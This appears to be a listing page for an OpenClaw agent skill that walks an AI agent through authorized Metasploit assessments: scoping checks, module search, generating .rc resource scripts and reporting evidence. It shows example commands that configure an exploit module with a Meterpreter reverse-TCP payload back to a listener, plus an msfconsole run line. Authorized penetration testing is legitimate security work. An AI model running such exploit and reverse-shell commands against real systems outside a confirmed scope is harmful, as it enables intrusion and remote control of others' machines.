Install
openclaw skills install metasploit-skillPlan and execute authorized Metasploit assessments for OpenClaw tasks with repeatable workflows, including target triage, exploit module selection, option tu...
openclaw skills install metasploit-skillUse this skill to run deterministic and auditable Metasploit workflows for authorized security testing.
Prefer a check-first workflow and generate repeatable .rc scripts via scripts/build_rc.py instead of ad hoc console typing.
scripts/build_rc.py.msfconsole with check before run or exploit.Require explicit confirmation of:
If scope is unclear, stop and ask for clarification before proceeding.
Capture minimum actionable context:
Use this context to justify each module choice.
Use search and info in msfconsole to narrow candidates:
search type:exploit cve:2023 service:http
info exploit/linux/http/<module_name>
show options
show payloads
Choose modules by:
For common mappings and tradeoffs, read module-selection.md.
Generate reproducible execution scripts:
python3 scripts/build_rc.py \
--module exploit/linux/http/example_module \
--rhosts 10.10.10.15 \
--rport 8080 \
--payload linux/x64/meterpreter/reverse_tcp \
--lhost 10.10.10.5 \
--lport 4444 \
--set TARGETURI=/app \
--check \
--job \
--output run_example.rc
Review generated commands before execution:
Run with logging enabled:
msfconsole -q -r run_example.rc
Inside msfconsole, verify:
check output statusrun or exploit resultsessions -l visibilityIf exploitation fails, adjust one variable at a time and re-run.
Minimum evidence set:
Use workflow.md for command-level checklists and reporting structure.
Produce output with:
Keep reports concise and technically verifiable.
Generate a repeatable Metasploit .rc resource script from structured options.
Module and payload selection heuristics with common service mappings.
Command checklist for execution, troubleshooting loop, and report field requirements.